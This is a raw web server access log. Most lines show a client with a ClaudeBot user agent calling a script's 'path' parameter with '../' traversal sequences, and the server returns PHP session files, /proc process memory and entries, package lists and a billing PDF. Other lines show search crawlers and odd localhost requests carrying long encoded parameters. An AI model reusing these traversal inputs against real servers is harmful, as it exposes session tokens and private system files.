216.73.216.215 - - [13/Jan/2026:11:14:38 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_b1351eea6bc916c2e39d326311388a86 HTTP/1.0" 200 1636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:14:41 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_b45ecee31e66ef78d7bd24f95da57418 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:14:44 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_b45ecee31e66ef78d7bd24f95da57418 HTTP/1.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:09:24 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353336342p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313736342q3730613132333230383032663336373934333930663835383733646439383666222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
52.167.144.219 - - [13/Jan/2026:11:14:45 +0300] "GET /product/714766831.htm HTTP/1.0" 200 26304 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:11:14:47 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_b45ecee31e66ef78d7bd24f95da57418 HTTP/1.0" 200 1384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:14:50 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fvar%2Ffiles%2Fmedcompftp%2Ftestsite_ftp%2Fbill_27245_2017.PDF HTTP/1.0" 200 1396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:14:53 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_1e63cdbfae76f1e3fbe91823aa4d90e3 HTTP/1.0" 200 1384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:14:56 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_1e63cdbfae76f1e3fbe91823aa4d90e3 HTTP/1.0" 200 1383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:14:59 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_1e63cdbfae76f1e3fbe91823aa4d90e3 HTTP/1.0" 200 1385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:02 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_99047fbed94cdc59cab4f9f22ba78b0d HTTP/1.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:05 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_a2e41880e9376107b256fb03f10b9dde HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:09:45 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353338352p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313738352q3638633538313532373731353138646134343735343862643662333165646163222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:15:08 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_99047fbed94cdc59cab4f9f22ba78b0d HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:11 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_a2e41880e9376107b256fb03f10b9dde HTTP/1.0" 200 1385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.66 - - [13/Jan/2026:11:15:12 +0300] "GET /?product=313649377 HTTP/1.0" 200 29663 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:15:14 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_a2e41880e9376107b256fb03f10b9dde HTTP/1.0" 200 1384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:16 +0300] "GET /robots.txt HTTP/1.0" 200 404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:17 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_99047fbed94cdc59cab4f9f22ba78b0d HTTP/1.0" 200 1383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:20 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_5829e78db034fb74279765617c602287 HTTP/1.0" 200 1389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:23 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_f90e4d60f572810b1417f5c8e800fdc4 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:26 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_efa69643890628fee6a24478816fb5b4 HTTP/1.0" 200 1632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:10:06 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353430362p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313830362q3634616636633137623031363838323932653565376435353137363639666564222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:15:29 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_5829e78db034fb74279765617c602287 HTTP/1.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:32 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_5829e78db034fb74279765617c602287 HTTP/1.0" 200 1389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:35 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_f90e4d60f572810b1417f5c8e800fdc4 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:15:38 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_f90e4d60f572810b1417f5c8e800fdc4 HTTP/1.0" 200 1384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.20.17 - - [13/Jan/2026:11:15:40 +0300] "GET /?product=996476917 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
127.0.0.1 - - [13/Jan/2026:11:10:27 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353432372p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313832372q6563626464326339653332316231326530393661383735616133363661303034222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
66.249.73.64 - - [13/Jan/2026:11:15:49 +0300] "GET /?product=817035327 HTTP/1.0" 200 29251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.215 - - [13/Jan/2026:11:16:03 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2Fvim%2F..%2Fghostscript%2F.%2FCMap%2FUCS2-KSCpc-EUC HTTP/1.0" 200 58705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:06 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fucf%2F..%2Fghostscript%2FCMap%2FUniKS-UTF32-V HTTP/1.0" 200 2718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:10:48 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353434382p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313834382q3633343731613166663462613865343766343235353034653733343536636135222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:16:09 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fproc%2Fnet%2Fstat HTTP/1.0" 200 2024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:12 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2Fnet%2F.%2Fstat HTTP/1.0" 200 2026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.66 - - [13/Jan/2026:11:16:11 +0300] "GET /?product=313644227 HTTP/1.0" 200 25549 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:16:15 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2Fnet%2F.%2Fstat HTTP/1.0" 200 2025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.66 - - [13/Jan/2026:11:16:14 +0300] "GET /?product=1029102632 HTTP/1.0" 200 24897 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:16:18 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Finitscripts%2F..%2Fdpkg%2Finfo%2Ftime.list HTTP/1.0" 200 1503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:21 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fvim%2F..%2Fnfs%2Fstate HTTP/1.0" 200 1371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:24 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F615%2Ftask%2F615%2Fexe HTTP/1.0" 200 1630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.129 - - [13/Jan/2026:11:16:25 +0300] "GET /?product=1029091471 HTTP/1.0" 200 25132 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.167.144.219 - - [13/Jan/2026:11:16:25 +0300] "GET /product/1852852879.htm HTTP/1.0" 200 26919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:11:16:27 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F6565%2Fnet%2Fprotocols HTTP/1.0" 200 1695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:11:09 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353436392p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313836392q6162386336646230393832313366363931633635653532616166646634623966222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:16:30 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F6565%2Fnet%2Fprotocols HTTP/1.0" 200 1692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:33 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Finitscripts%2F..%2Fdpkg%2Finfo%2Fmlock.list HTTP/1.0" 200 1488 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:36 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fbind%2F..%2Fghostscript%2F.%2FCMap%2FAdobe-Japan1-1 HTTP/1.0" 200 2926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:39 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F54%2Fattr%2Fsockcreate HTTP/1.0" 200 1376 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.41 - - [13/Jan/2026:11:16:39 +0300] "GET /072b9/?path=/var/lib//apache2//module//enabled_by_admin//headers HTTP/1.0" 200 1397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:11:16:42 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F329%2Fmem HTTP/1.0" 200 1363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:45 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F329%2Fmem HTTP/1.0" 200 1364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.20.32 - - [13/Jan/2026:11:16:46 +0300] "GET /?product=1791953887 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.215 - - [13/Jan/2026:11:16:48 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fsbin%2F.%2Frarp HTTP/1.0" 200 1359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.64 - - [13/Jan/2026:11:16:49 +0300] "GET /?product=1029107588 HTTP/1.0" 200 25292 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
127.0.0.1 - - [13/Jan/2026:11:11:30 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353439302p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313839302q3162616334313166303066613739326164386564623336626530633834646635222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:16:51 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fsbin%2F.%2Frarp HTTP/1.0" 200 1359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:54 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F56%2Fclear_refs HTTP/1.0" 200 1366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:16:57 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F56%2Fclear_refs HTTP/1.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:00 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Fpython-support%2F..%2Fx86_64-linux-gnu%2Fgtk-2.0%2F2.10.0 HTTP/1.0" 200 2031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:03 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F625%2Fexe HTTP/1.0" 200 1613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:06 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Flogwatch.3NO4D4bE HTTP/1.0" 200 1614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.65 - - [13/Jan/2026:11:17:07 +0300] "GET /?product=306964377 HTTP/1.0" 200 25654 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.215 - - [13/Jan/2026:11:17:09 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F46%2Ftimers HTTP/1.0" 200 1363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:11:51 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353531312p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313931312q3430393332383662623236313765353162373264346434373161373238633237222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:17:12 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F46%2Ftimers HTTP/1.0" 200 1362 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.65 - - [13/Jan/2026:11:17:12 +0300] "GET /?product=1029072380 HTTP/1.0" 200 25542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:17:15 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F922%2F.%2Ftask%2F922%2Fsyscall HTTP/1.0" 200 1381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:18 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Finitscripts%2F..%2Fdpkg%2Finfo%2Fphp7.1-sybase.postrm HTTP/1.0" 200 1847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:21 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Finitscripts%2F..%2Fdpkg%2Finfo%2Fphp-gettext.md5sums HTTP/1.0" 200 1937 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:24 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F122%2Fnuma_maps HTTP/1.0" 200 1362 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:27 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F612%2Ftask%2F612%2Foom_adj HTTP/1.0" 200 1375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:30 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F6566%2Fnet%2Fsoftnet_stat HTTP/1.0" 200 1465 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:12:12 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353533322p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313933322q3866353263313163396466313731363231363032393430316338663061316164222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:17:33 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Frun%2F..%2Fproc%2F22507%2Ftask HTTP/1.0" 200 1883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.128 - - [13/Jan/2026:11:17:33 +0300] "GET /?product=2361641810 HTTP/1.0" 200 26262 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:17:36 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2Fnet%2F.%2F.%2Funix HTTP/1.0" 200 3367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:39 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2Fnet%2F.%2F.%2Funix HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
